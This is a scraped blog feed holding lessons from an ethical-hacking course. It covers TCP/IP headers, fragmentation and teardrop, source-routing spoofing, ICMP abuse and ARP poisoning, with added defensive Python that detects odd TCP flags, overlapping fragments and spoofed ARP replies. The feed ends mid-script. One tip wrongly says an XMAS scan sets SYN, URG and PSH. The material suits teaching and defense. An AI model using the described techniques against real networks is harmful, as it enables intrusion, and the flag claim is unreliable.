TCP enables two hosts to establish a connection and exchange data  reliably. To do this, TCP performs a three-step handshake before data is  sent. During the data-transmission process, TCP guarantees delivery of  data by using sequence and acknowledgment numbers. At the completion of  the data-transmission process, TCP performs a four-step shutdown that  gracefully concludes the session. The startup and shutdown sequences are  shown in Figure 2.4.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image008.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
TCP has a fixed packet structure that is used to provide flow control,  maintain reliable communication, and ensure that any missing data is  resent. At the heart of TCP is a 1-byte flag field. Flags help control  the TCP process. Common flags include synchronize (SYN), acknowledgement  (ACK), push (PSH), and finish (FIN). Figure 2.5 details the TCP packet  structure. TCP security issues include TCP sequence number attacks,  session hijacking, and SYN flood attacks. Programs, such as Nmap,  manipulate TCP flags to attempt to identify active hosts. &lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image010.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
The ports shown previously in Table 2.1 identify the source and target  application, whereas the sequence and acknowledgement numbers are used  to assemble packets into their proper order. The flags are used to  manage TCP sessions—for example, the synchronize (SYN) and acknowledge  (ACK) flags are used in the three-way handshaking, whereas the reset  (RST) and finish (FIN) flags are used to tear down a connection. FIN is  used during a normal four-step shutdown, whereas RST is used to signal  the end of an abnormal session. The checksum is used to ensure that the  data is correct, although an attacker can alter a TCP packet and the  checksum to make it appear valid. Other flags include urgent (URG). If  no flags are set at all, the flags can be referred to as Null, as none  are set. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
Not all hacking tools play by the rules; most port scanners can tweak TCP flags and send them in packets that should not normally exist in an attempt to elicit a response from the victim’s server. One such variation is the XMAS tree scan, which sets the SYN, URG, and PSH flags. Another is the NULL scan, which sets no flags in the TCP header. &lt;br /&gt;
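As an added example that is not part of the original lesson, the following Python decodes the TCP flag byte described above and labels segments whose flag combinations should not normally exist, including the Null case with no flags set. The sample segments are constructed 20-byte TCP headers rather than captured traffic, and the anomaly rules follow RFC 793 rather than any particular scanner. &lt;br /&gt;

```python
"""Decode TCP flags and label flag combinations that should not normally exist.

Added example, not code from the original lesson. The segments below are
constructed 20-byte TCP headers (no options) built with struct, so the check
runs offline without a capture file.
"""
import struct

# Flag bits in the 14th byte of the TCP header (RFC 793 plus the ECN bits).
FLAG_BITS = {
    "FIN": 1, "SYN": 2, "RST": 4, "PSH": 8,
    "ACK": 16, "URG": 32, "ECE": 64, "CWR": 128,
}

# ports, seq, ack, offset/reserved, flags, window, checksum, urgent pointer
TCP_HEADER = "!HHIIBBHHH"


def bit_set(value, bit):
    """True when the single bit 'bit' is set in 'value'."""
    return (value // bit) % 2 == 1


def decode_flags(flag_byte):
    """Return the set of flag names whose bit is set in the flag byte."""
    return {name for name, bit in FLAG_BITS.items() if bit_set(flag_byte, bit)}


def classify(flags):
    """Label a flag set.

    'null'    no flags at all, the Null case from the lesson
    'invalid' a combination a conforming TCP stack never sends
    'normal'  anything else
    """
    if not flags:
        return "null"
    if "SYN" in flags and ("FIN" in flags or "RST" in flags):
        return "invalid"  # a segment can not open and close/abort at once
    if "ACK" not in flags and flags - {"SYN", "RST"}:
        return "invalid"  # after the initial SYN, every segment carries ACK
    return "normal"


def parse_tcp_header(raw):
    """Extract ports, sequence/ack numbers and flags from a TCP header.

    struct raises on input shorter than 20 bytes.
    """
    sport, dport, seq, ack, off_res, flag_byte, win, _csum, _urg = struct.unpack(
        TCP_HEADER, raw[:20])
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "data_offset": (off_res // 16) * 4,   # header length in bytes
        "window": win,
        "flags": decode_flags(flag_byte),
    }


def make_tcp_header(sport, dport, flags, seq=0, ack=0):
    """Build a 20-byte TCP header with the given flags (checksum left zero)."""
    flag_byte = sum(FLAG_BITS[name] for name in flags)
    return struct.pack(TCP_HEADER, sport, dport, seq, ack, 5 * 16, flag_byte,
                       65535, 0, 0)


def audit(segments):
    """Return (dport, sorted flag names, label) for each raw segment."""
    report = []
    for raw in segments:
        hdr = parse_tcp_header(raw)
        report.append((hdr["dport"], sorted(hdr["flags"]), classify(hdr["flags"])))
    return report


# Constructed sample segments, all aimed at port 80 from high client ports.
SAMPLE_SEGMENTS = [
    make_tcp_header(40001, 80, {"SYN"}, seq=1000),                  # handshake start
    make_tcp_header(40002, 80, set()),                              # Null: no flags
    make_tcp_header(40003, 80, {"FIN", "PSH", "URG"}),              # FIN without ACK
    make_tcp_header(40004, 80, {"SYN", "FIN"}),                     # contradictory
    make_tcp_header(40005, 80, {"ACK", "PSH"}, seq=1001, ack=5001), # normal data
]

if __name__ == "__main__":
    for dport, flags, label in audit(SAMPLE_SEGMENTS):
        print(f"port {dport}: flags={flags} label={label}")
```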
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;User Datagram Protocol (UDP)&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
UDP performs none of the handshaking processes that we see performed  with TCP. Although that makes it considerably less reliable than TCP, it  does offer the benefit of speed. It is ideally suited for data that  requires fast delivery and is not sensitive to packet loss. UDP is used  by services such as DHCP and DNS. UDP is easier to spoof by attackers  than TCP as it does not use sequence and acknowledgement numbers. Figure  2.6 shows the packet structure of UDP. &lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image012.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The Internet Layer&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt; &lt;br /&gt;
Describe how Internet Control Message Protocol (ICMP) functions and its purpose &lt;br /&gt;
&lt;br /&gt;
The Internet layer contains two important protocols: Internet Protocol (IP) and Internet Control Message Protocol (ICMP). IP is a routable protocol whose function is to make a best effort at delivery. The IP header is shown in Figure 2.7. Spend a few minutes reviewing it to better understand each field’s purpose and structure. Although reviewing the structure of UDP, TCP, and IP packets might not be the most exciting part of security work, a basic understanding is desirable because many attacks are based on manipulation of the packets. For example, the total length field and fragmentation are tweaked in a ping of death attack. &lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image014.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
IP addresses are laid out in a dotted decimal notation format. IPv4 lays  out addresses into a four decimal number format that is separated by  decimal points. Each of these decimal numbers is one byte in length to  allow numbers to range from 0–255. Table 2.2 shows IPv4 addresses and  the number of available networks and hosts. &lt;br /&gt;
&lt;br /&gt;
TABLE 2.2 IPv4 Addressing &lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 114px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Address Class   Address Range   Number of Networks   Number of Hosts 
A               1-126           126                  16,777,214 
B               128-191         16,384               65,534 
C               192-223         2,097,152            254 
D               224-239         NA                   NA 
E               240-255         NA                   NA&lt;/pre&gt;&lt;/div&gt;A number of addresses have also been reserved for private use. These addresses are non-routable and normally should not be seen on the Internet. Table 2.3 defines the private address ranges. &lt;br /&gt;
&lt;br /&gt;
TABLE 2.3 Private Address Ranges &lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 82px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Address Class   Address Range                   Default Subnet Mask 
A               10.0.0.0 - 10.255.255.255       255.0.0.0 
B               172.16.0.0 - 172.31.255.255     255.255.0.0 
C               192.168.0.0 - 192.168.255.255   255.255.255.0&lt;/pre&gt;&lt;/div&gt;IP does more than just addressing. It can dictate a specific path by using strict or loose source routing, and IP is also responsible for datagram fragmentation. Fragmentation normally occurs when files must be split because of maximum transmission unit (MTU) size limitations. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Source Routing: The Hacker’s Friend&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
Source routing was designed to allow individuals the ability to specify  the route that a packet should take through a network. It allows the  user to bypass network problems or congestion. IP’s source routing  informs routers not to use their normal routes for delivery of the  packet but to send it via the router identified in the packet’s header.  This lets a hacker use another system’s IP address and get packets  returned to him regardless of what routes are in between him and the  destination. This type of attack can be used if the victim’s web server  is protected by an access list based on source addresses. If the hacker  were to simply spoof one of the permitted source addresses, traffic  would never be returned to him. By spoofing an address and setting the  loose source routing option to force the response to return to the  hacker’s network, the attack might succeed. The best defense against  this type of attack is to block loose source routing and not respond to  packets set with this option. &lt;br /&gt;
&lt;br /&gt;
If IP must send a datagram larger than allowed by the network access  layer that it uses, the datagram must be divided into smaller packets.  Not all network topologies can handle the same datagram size; therefore,  fragmentation is an important function. As IP packets pass through  routers, IP reads the acceptable size for the network access layer. If  the existing datagram is too large, IP performs fragmentation and  divides the datagram into two or more packets. Each packet is labeled  with a length, an offset, and a more bit. The length specifies the total  length of the fragment, the offset specifies the distance from the  first byte of the original datagram, and the more bit is used to  indicate if the fragment has more to follow or if it is the last in the  series of fragments. An example is shown in Figure 2.8. &lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image016.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
The first fragment has an offset of 0 and occupies bytes 0–999. The  second fragment has an offset of 1,000 and occupies bytes 1,000–1,999.  The third fragment has an offset of 2,000 and occupies bytes  2,000–2,999, and the final fragment has an offset 3,000 and occupies  bytes 3,000–3,599. Whereas the first three fragments have the more bit  set to 1, the final fragment has the more bit set to 0 because no more  fragments follow. These concepts are important to understand how various  attacks function. If you are not completely comfortable with these  concepts, you might want to review a general TCP/IP network book. TCP/IP  Illustrated by Richard Stevens is recommended. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
On modern networks, there should be very little fragmentation. Usually such traffic will indicate malicious activities. &lt;br /&gt;
&lt;br /&gt;
To get a better idea of how fragmentation can be exploited by hackers,  consider the following: Normally, these fragments follow the logical  structured sequence as shown in Figure 2.8. Hackers can manipulate  packets to cause them to overlap abnormally, as shown in Figure 2.9. &lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image018.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
Hackers can also craft packets so that instead of overlapping, there  will be gaps between various packets. These nonadjacent fragmented  packets are similar to overlapping packets because they can crash or  hang older operating systems that have not been patched. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;TIP&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
A good example of the overlapping fragmentation attack is the teardrop attack. The teardrop attack exploits overlapping IP fragments and can crash Windows 95, Windows NT, and Windows 3.1 machines. &lt;br /&gt;
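As an added example that is not part of the original lesson, the following Python builds IPv4 fragment headers like those in Figure 2.8 and checks a fragment set for the overlaps and gaps just described, which is the check a reassembler or an IDS needs to make before trusting the datagram. The fragments are constructed headers with made-up private addresses. &lt;br /&gt;

```python
"""Check a set of IPv4 fragments for the overlaps and gaps described above.

Added example, not code from the original lesson. The fragments are
constructed 20-byte IPv4 headers (no options); payload bytes are omitted
because only total length, flags and offset matter for this check.
"""
import struct

IPV4_HEADER = "!BBHHHBBH4s4s"
SRC = bytes([10, 0, 0, 5])    # constructed private addresses
DST = bytes([10, 0, 0, 9])


def make_fragment(ident, offset, payload_len, more):
    """Build an IPv4 header for one fragment of datagram 'ident'.

    'offset' is in bytes and must be a multiple of 8, because the header
    stores it in 8-byte units; 'more' is the More Fragments (MF) bit.
    """
    if offset % 8:
        raise ValueError("fragment offset must be a multiple of 8 bytes")
    flags_frag = (8192 if more else 0) + offset // 8   # MF is bit 13
    return struct.pack(IPV4_HEADER, 0x45, 0, 20 + payload_len, ident,
                       flags_frag, 64, 17, 0, SRC, DST)


def fragment_info(raw):
    """Decode the fields a reassembler needs from an IPv4 header."""
    ver_ihl, _tos, total_len, ident, flags_frag, _ttl, _proto, _csum, _src, _dst = \
        struct.unpack(IPV4_HEADER, raw[:20])
    header_len = (ver_ihl % 16) * 4
    return {
        "id": ident,
        "offset": (flags_frag % 8192) * 8,        # low 13 bits, 8-byte units
        "more": (flags_frag // 8192) % 2 == 1,    # MF bit
        "length": total_len - header_len,         # payload bytes in this fragment
    }


def check_fragment_set(infos):
    """Verdict for the fragments of one datagram.

    'ok'            fragments are adjacent, start at 0 and end with MF clear
    'overlap'       a fragment starts before the previous one ended
    'gap'           a fragment starts after the previous one ended
    'missing-first' no fragment with offset 0
    'incomplete'    the last fragment still has MF set
    """
    frags = sorted(infos, key=lambda f: f["offset"])
    if frags[0]["offset"] != 0:
        return "missing-first"
    expected = 0
    for frag in frags:
        if frag["offset"] != expected:
            # min() tells us which side of the expected position we landed on;
            # a duplicate of an earlier fragment also shows up as an overlap
            if min(frag["offset"], expected) == frag["offset"]:
                return "overlap"
            return "gap"
        expected = frag["offset"] + frag["length"]
    if frags[-1]["more"]:
        return "incomplete"
    return "ok"


def analyze(raw_packets):
    """Group fragments by identification and return {id: verdict}."""
    groups = {}
    for raw in raw_packets:
        info = fragment_info(raw)
        groups.setdefault(info["id"], []).append(info)
    return {ident: check_fragment_set(infos) for ident, infos in groups.items()}


def datagram_length(raw_packets):
    """Reassembled payload size implied by the fragment with the highest offset."""
    infos = [fragment_info(raw) for raw in raw_packets]
    last = max(infos, key=lambda f: f["offset"])
    return last["offset"] + last["length"]


# Constructed samples. Datagram 1 is the normal 3,600-byte sequence from the
# lesson; datagram 2 overlaps; datagram 3 leaves a gap.
NORMAL = [make_fragment(1, 0, 1000, True), make_fragment(1, 1000, 1000, True),
          make_fragment(1, 2000, 1000, True), make_fragment(1, 3000, 600, False)]
OVERLAP = [make_fragment(2, 0, 1000, True), make_fragment(2, 1000, 1000, True),
           make_fragment(2, 1600, 1000, False)]
GAP = [make_fragment(3, 0, 1000, True), make_fragment(3, 2000, 600, False)]

if __name__ == "__main__":
    print(analyze(NORMAL + OVERLAP + GAP))
    print("datagram 1 reassembles to", datagram_length(NORMAL), "bytes")
```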
&lt;br /&gt;
One of the other protocols residing at the Internet layer is ICMP. Its purpose is to provide feedback used for diagnostics or to report logical errors. ICMP messages follow a basic format. The first byte of an ICMP header indicates the type of ICMP message. The following byte contains the code for each particular type of ICMP. The ICMP type generally defines the problem, whereas the code gives the specific reason for it. As an example, a Type 3, Code 3 ICMP message means that there was a destination error and that the specific destination error is that the targeted port is unreachable. Eight of the most common ICMP types are shown in Table 2.4. &lt;br /&gt;
&lt;br /&gt;
TABLE 2.4 ICMP Types and Codes &lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 162px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Type     Code    Function 
0/8      0       Echo Response/Request (Ping) 
3        0-15    Destination Unreachable 
4        0       Source Quench 
5        0-3     Redirect 
11       0-1     Time Exceeded 
12       0       Parameter Fault 
13/14    0       Time Stamp Request/Response 
17/18    0       Subnet Mask Request/Response&lt;/pre&gt;&lt;/div&gt;The most common ICMP types in Table 2.4 are types 0 and 8, the ICMP ping reply and request. Although a ping is useful to determine if a host is up, it is also a useful tool for the attacker. The ping can be used to inform a hacker if a computer is online. Although the designers of ICMP envisioned a protocol that would be helpful and informative, hackers use ICMP to send the ping of death, craft Smurf DoS packets, query the timestamp of a system or its netmask, or even send ICMP type 5 packets to redirect traffic. A complete list of Type 3 codes is provided in Table 2.5. &lt;br /&gt;
&lt;br /&gt;
TABLE 2.5 Type 3 Codes &lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 258px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Code  Function 
0      Net Unreachable 
1      Host Unreachable 
2      Protocol Unreachable 
3      Port Unreachable 
4      Fragmentation Needed and Don't Fragment was Set 
5      Source Route Failed 
6      Destination Network Unknown 
7      Destination Host Unknown 
8      Source Host Isolated 
9      Communication with Destination Network is Administratively Prohibited 
10     Communication with Destination Host is Administratively Prohibited 
11     Destination Network Unreachable for Type of Service 
12     Destination Host Unreachable for Type of Service 
13     Communication Administratively Prohibited&lt;/pre&gt;&lt;/div&gt;&lt;b&gt;EXAM ALERT&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Type 11 ICMP time exceeded messages are used by most traceroute programs to determine the IP addresses of intermediate routers.&lt;br /&gt;
&lt;br /&gt;
Address Resolution Protocol (ARP) is the final protocol reviewed at the IP layer. ARP’s role in the world of networking is to resolve known IP addresses to unknown MAC addresses. ARP’s two-step resolution process is performed by first sending a broadcast message requesting the target’s physical address. If a device recognizes the address as its own, it issues an ARP reply containing its MAC address to the original sender. The MAC address is then placed in the ARP cache and used to address subsequent frames. Hackers are interested in the ARP process because it can be manipulated to bypass the functionality of a switch. Because ARP was developed in a trusting world, bogus ARP responses are accepted as valid, which can allow attackers to redirect traffic on a switched network. Proxy ARP can be used to extend a network and enable one device to communicate with a device on an adjacent segment. ARP attacks play a role in a variety of man-in-the-middle attacks, spoofing, and session hijacking attacks. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;EXAM ALERT&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
ARP is unauthenticated and, as such, can be used for unsolicited ARP  replies, for poisoning the ARP table, and for spoofing another host. &lt;br /&gt;
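As an added example that is not part of the original lesson, the following Python shows the detection side of the ARP weakness described above: it tracks which IP addresses were actually requested and which MAC address each IP last claimed, and raises an alert on replies nobody asked for and on bindings that change. The packets and addresses are constructed, not captured. &lt;br /&gt;

```python
"""Flag ARP replies that were never requested and IP-to-MAC bindings that change.

Added example, not code from the original lesson. The packets are constructed
28-byte ARP bodies (Ethernet/IPv4) built with struct; the addresses are made-up
private-range values.
"""
import struct

ARP_FORMAT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
REQUEST, REPLY = 1, 2


def mac(text):
    """'aa:bb:cc:dd:ee:ff' to 6 raw bytes."""
    return bytes(int(part, 16) for part in text.split(":"))


def ip(text):
    """'10.0.0.1' to 4 raw bytes."""
    return bytes(int(part) for part in text.split("."))


def make_arp(oper, sha, spa, tha, tpa):
    """Build one ARP body for an Ethernet/IPv4 network."""
    return struct.pack(ARP_FORMAT, 1, 0x0800, 6, 4, oper,
                       mac(sha), ip(spa), mac(tha), ip(tpa))


def parse_arp(raw):
    """Decode an ARP body into colon-separated MACs and dotted IPs."""
    _ht, _pt, _hl, _pl, oper, sha, spa, tha, tpa = struct.unpack(ARP_FORMAT, raw[:28])
    return {
        "oper": oper,
        "sha": ":".join(f"{b:02x}" for b in sha),
        "spa": ".".join(str(b) for b in spa),
        "tha": ":".join(f"{b:02x}" for b in tha),
        "tpa": ".".join(str(b) for b in tpa),
    }


class ArpMonitor:
    """Track outstanding requests and learned bindings; collect alerts.

    A reply is 'unsolicited' when nobody on the segment asked for that IP.
    Gratuitous ARP is unsolicited by design, so a real deployment would
    allow-list the hosts expected to send it.
    """

    def __init__(self):
        self.pending = set()     # IPs that were asked for and not yet answered
        self.bindings = {}       # IP address to the MAC last seen claiming it
        self.alerts = []

    def observe(self, raw):
        pkt = parse_arp(raw)
        if pkt["oper"] == REQUEST:
            self.pending.add(pkt["tpa"])
            return
        if pkt["oper"] != REPLY:
            return
        if pkt["spa"] not in self.pending:
            self.alerts.append(("unsolicited-reply", pkt["spa"], pkt["sha"]))
        self.pending.discard(pkt["spa"])
        known = self.bindings.get(pkt["spa"])
        if known is not None and known != pkt["sha"]:
            self.alerts.append(("binding-changed", pkt["spa"], f"{known} to {pkt['sha']}"))
        self.bindings[pkt["spa"]] = pkt["sha"]


def run_monitor(packets):
    """Feed raw ARP bodies through a fresh monitor; return (alerts, bindings)."""
    mon = ArpMonitor()
    for raw in packets:
        mon.observe(raw)
    return mon.alerts, mon.bindings


# Constructed traffic: a normal request/reply for the gateway 10.0.0.1,
# then a bogus reply that tries to move 10.0.0.1 to another MAC.
SAMPLE_PACKETS = [
    make_arp(REQUEST, "00:aa:00:00:00:50", "10.0.0.50",
             "00:00:00:00:00:00", "10.0.0.1"),
    make_arp(REPLY, "00:11:22:33:44:55", "10.0.0.1",
             "00:aa:00:00:00:50", "10.0.0.50"),
    make_arp(REPLY, "de:ad:be:ef:00:01", "10.0.0.1",
             "00:aa:00:00:00:50", "10.0.0.50"),
]

if __name__ == "__main__":
    alerts, bindings = run_monitor(SAMPLE_PACKETS)
    for alert in alerts:
        print(alert)
    print(bindings)
```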
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;The Network Access Layer&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
The network access layer is the bottom of the stack. This portion of the TCP/IP network model is responsible for the physical delivery of IP packets via frames. Ethernet is the most commonly used LAN frame type. Ethernet frames are addressed with MAC addresses that identify the source and destination device. MAC addresses are 6 bytes long and are unique to the network interface card (NIC) in which they are burned. To get a better idea of what MAC addresses look like, review Figure 2.10, as it shows a packet with both the destination and source MAC addresses. Hackers can use a variety of programs to spoof MAC addresses. MAC address spoofing is attractive to attackers attempting to bypass 802.11 wireless controls or switches that control traffic by locking ports to specific MAC addresses. &lt;br /&gt;
&lt;br /&gt;
MAC addresses can be either unicast, multicast, or broadcast. Although a  destination MAC address can be any one of these three types, a frame  will always originate from a unicast MAC address. &lt;br /&gt;
&lt;br /&gt;
The three types of MAC addresses can be easily identified, as follows: &lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 82px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Type        Identified by 
Unicast     The first byte is always an even value. 
Multicast   The low-order bit of the first byte is always on, so the first byte of a multicast MAC address is an odd value. As an example, notice the first byte (01) of the following MAC address, 0x-01-00-0C-CC-CC-CC. 
Broadcast   They are all binary 1s or will appear in hex as FF FF FF FF FF FF.&lt;/pre&gt;&lt;/div&gt;&lt;img alt="" border="0" src="http://www.go4expert.com/forums/images/articles/ethicalhackingbasicspart2/image020.gif" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Summary&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
This lesson discusses the attacker’s methodology, as well as some of the methodologies used by ethical hackers. Ethical hackers differ from malicious hackers in that ethical hackers seek to do no harm and work to improve an organization’s security by thinking like a hacker. This lesson also discusses the OSI model and the TCP/IP protocol suite. It looks at some of the most commonly used protocols in the suite and examines how they are used and misused by hackers. Common ports are discussed, as is the principle of deny all. Starting with all ports and protocols blocked leaves the organization in a much more secure stance than simply blocking ports that are deemed dangerous or unneeded.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/1QxWC63C6Sg/ethical-hacking-class-part-2.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/02/ethical-hacking-class-part-2.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-3733041734481111112</guid><pubDate>Tue, 22 Feb 2011 11:10:00 +0000</pubDate><atom:updated>2011-02-22T03:10:28.682-08:00</atom:updated><title>Facebook Security: Have you enabled https login?</title><description>Last month we carried Facebook's announcement to enable its users secure HTTPS access to the popular social networking website online. The security announcement came shortly after Mark Zuckerberg's Facebook page was hacked in late January.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Since the announcement, Facebook has been rolling out the option for users to enable secure HTTPS access to the website through their Web browsers. A lot of Facebook users already have the ability to better protect their Facebook account's security through HTTPS access, but we don't know if everyone knows how to enable the feature. &lt;br /&gt;
&lt;br /&gt;
It's quite easy, actually. Just head over to Account Settings &amp;gt; Account Security in your Facebook profile.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-3733041734481111112?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/VCcO0wn3cvI" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/VCcO0wn3cvI/facebook-security-have-you-enabled.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/02/facebook-security-have-you-enabled.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-7249832037795472016</guid><pubDate>Tue, 22 Feb 2011 10:46:00 +0000</pubDate><atom:updated>2011-02-22T02:46:07.551-08:00</atom:updated><title>Ethical Hacking Basics Class part 1</title><description>&lt;h3 class="articleheading"&gt;Introduction &lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
This lesson introduces you to the world of ethical hacking. Ethical  hacking is a form of legal hacking that is done with the permission of  an organization to help increase its security. This lesson discusses  many of the business aspects of penetration (pen) testing. Information  about how to perform a pen test, what types can be performed, what are  the legal requirements, and what type of report should be delivered are  all basic items that you will need to know before you perform any type  of security testing. However, first, you need to review some security  basics. This lesson starts with a discussion of confidentiality,  integrity, and availability. Finally, the lesson finishes up with the  history of hacking and a discussion of some of the pertinent laws. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Nothing learned in this class is intended to teach or encourage the use  of security tools or methodologies for illegal or unethical purposes.  Always act in a responsible manner. Make sure that you have written  permission from the proper individuals before you use any of the tools  or techniques described within. Always obtain permission before  installing any of these tools on a network. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Security Fundamentals&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Security is about finding a balance, as all systems have limits. No one  person or company has unlimited funds to secure everything, and we  cannot always take the most secure approach. One way to secure a system  from network attack is to unplug it and make it a standalone system.  Although this system would be relatively secure from Internet-based  attackers, its usability would be substantially reduced. The opposite  approach of plugging it in directly to the Internet without any  firewall, antivirus, or security patches would make it extremely  vulnerable, yet highly accessible. So, here again, you see that the job  of security professionals is to find a balance somewhere between  security and usability. Figure 1.1 demonstrates this concept.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To find this balance, you need to know what the goals of the  organization are, what security is, and how to measure the threats to  security. The next section discusses the goals of security. &lt;br /&gt;
&lt;br /&gt;
&lt;h3 class="articleheading"&gt;Goals of Security&lt;/h3&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Objective:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Understand the security triangle, also known as CIA (confidentiality, integrity, and availability). &lt;br /&gt;
&lt;br /&gt;
There are many ways in which security can be achieved, but it’s  universally agreed that the security triad of confidentiality,  integrity, and availability (CIA) form the basic building blocks of any  good security initiative. &lt;br /&gt;
&lt;br /&gt;
Confidentiality addresses the secrecy and privacy of information. Physical examples of confidentiality include locked doors, armed guards, and fences. Logical examples of confidentiality can be seen in passwords, encryption, and firewalls. In the logical world, confidentiality must protect data in storage and in transit. For a real-life example of the failure of confidentiality, look no further than the news reports that have exposed how several large-scale breaches in confidentiality were the result of corporations, such as Time Warner and City National Bank, misplacing or losing backup tapes with customer accounts, names, and credit information. The simple act of encrypting the backup tapes could have prevented or mitigated the damage. &lt;br /&gt;
&lt;br /&gt;
Integrity is the second piece of the CIA security triad. Integrity provides for the correctness of information and allows users of information to have confidence in it. Correctness here doesn’t mean that the data is accurate, just that it hasn’t been modified in storage or transit. Integrity can apply to paper or electronic documents, but it is much harder to protect and verify in electronic data, where a change leaves no physical trace. Integrity must be protected in two modes: storage and transit. &lt;br /&gt;
&lt;br /&gt;
Information in storage can be protected if you use access and audit controls. Cryptography can also protect information in storage through the use of hashing algorithms: a reference hash is computed while a file is known to be good, and any later mismatch shows that the file has changed. Real-life examples of this technology can be seen in programs such as Tripwire, MD5Sum, and Windows File Protection (WFP). Two caveats apply. A bare hash only detects change; an attacker who can alter a file and also overwrite the stored reference hash defeats the check, so the baseline must be kept read-only or off the monitored system. And MD5 is no longer collision resistant, so new baselines should use SHA-256 or stronger. Integrity in transit is ensured primarily by the protocols used to transport the data, which authenticate each message with a keyed construction such as an HMAC or a digital signature rather than a plain hash, because an attacker who can modify traffic can just as easily recompute an unkeyed hash. &lt;br /&gt;
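The following script is an added illustration of the storage-integrity check described above; it is not code from the book, nor from Tripwire or any other product named there. It takes a SHA-256 baseline of a directory, tampers with the files in a constructed temporary tree (an account appended to a passwd file, a file deleted, a new binary planted), and reports what drifted. The directory layout and file contents are constructed for the example. &lt;br /&gt;

```python
import hashlib
import tempfile
from pathlib import Path

# Added example of a Tripwire-style baseline check; not Tripwire's own code.


def hash_file(path, algorithm="sha256"):
    """Return the hex digest of a file, reading it in chunks so large files fit in memory."""
    digest = hashlib.new(algorithm)
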